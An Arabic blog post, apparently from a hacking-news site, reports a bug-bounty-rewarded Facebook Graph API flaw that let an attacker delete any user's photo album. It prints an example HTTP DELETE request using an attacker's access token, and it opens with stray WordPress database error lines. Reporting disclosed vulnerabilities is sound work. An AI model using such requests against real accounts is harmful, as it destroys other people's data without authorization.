خطأ فى قاعدة بيانات ووردبريس: [Table 'alkrsan_d01r4.wkp_wf_sn_cf_bl_ips' doesn't exist]
SELECT tid FROM `wkp_wf_sn_cf_bl_ips` WHERE ip = '51.222.253.14'

خطأ فى قاعدة بيانات ووردبريس: [Table 'alkrsan_d01r4.wkp_wf_sn_cf_vl' doesn't exist]
SHOW FULL COLUMNS FROM `wkp_wf_sn_cf_vl`

ثغرة في الفيس بوك تسمح للهاكر بحذف البوم صور المستخدم – شبكة القرصان

ثغرة في الفيس بوك تسمح للهاكر بحذف البوم صور المستخدم

السلام عليكم

تمكن احد الهاكرز من اكتشاف ثغرة تمكن الهاكر من حذف اي البوم صور من الفيس بوك من دون صلاحيات

ويدعى Laxman Muthiyah ولقد استلم مكافئة من الفيس بوك 12 الف دولار لمساعدة فريق الفيس بوك لترقيع الثغرة

اكتشف الثغرة ف Graph API والي تتطلب access token

مثال كيف يتم استغلال الثغرة عبر ارسال استعلام


Request :-
DELETE /<Victim’s_photo_album_id> HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

 

يمكنكم مشاهدة الفيديو

https://www.youtube.com/watch?v=93EdTtVJKBU

اطيب الامنيات

 

إرسال التعليق